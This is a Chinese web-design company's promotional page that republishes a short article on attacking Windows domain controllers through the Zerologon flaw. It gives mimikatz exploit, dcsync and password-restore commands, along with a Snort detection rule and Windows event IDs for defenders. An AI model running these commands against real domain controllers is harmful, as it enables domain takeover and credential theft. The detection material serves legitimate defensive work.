十年网站开发经验 + 多家企业客户 + 靠谱的建站团队
量身定制 + 运营维护+专业推广+无忧售后,网站问题一站解决
本篇内容主要讲解“mimikatz怎么利用zerologon攻击域控服务器”,感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习“mimikatz怎么利用zerologon攻击域控服务器”吧!
创新互联建站是专业的习水网站建设公司,习水接单;提供网站设计、做网站,网页设计,网站设计,建网站,PHP网站建设等专业做网站服务;采用PHP框架,可快速的进行习水网站开发网页制作和功能扩展;专业做搜索引擎喜爱的网站,专业的做网站团队,希望更多企业前来合作!
mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix
官方利用截图如下
lsadump::zerologon /target:dc.hacke.testlab /account:dc$
poclsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit 通过zerologon
漏洞攻击域控服务器lsadump::dcsync
lsadump::postzerologon /target:conttosson.locl /account:dc$ #
恢复密码
alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)
利用zerologon漏洞攻击域控的数据包,方便同学们写完规则做测试pcap github下载地址
在未打补丁的域控,重点查看windows事件管理器中,eventid为4742或者4624, 5805
在windows 8月更新中,新增事件ID 5829,5827,5828,5830,5831。蓝队可以重点关注这几个事件ID以方便自查
mimikatz通过zerologon攻击成功后,将会留下事件id为4648。
到此,相信大家对“mimikatz怎么利用zerologon攻击域控服务器”有了更深的了解,不妨来实际操作一番吧!这里是创新互联网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!